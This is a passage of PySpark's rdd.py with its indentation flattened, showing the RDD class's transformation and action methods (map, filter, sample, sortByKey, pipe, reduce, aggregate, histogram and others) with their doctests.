>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
port, auth_secret = sock_info
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(15)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
sockfile = sock.makefile("rwb", 65536)
do_server_auth(sockfile, auth_secret)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
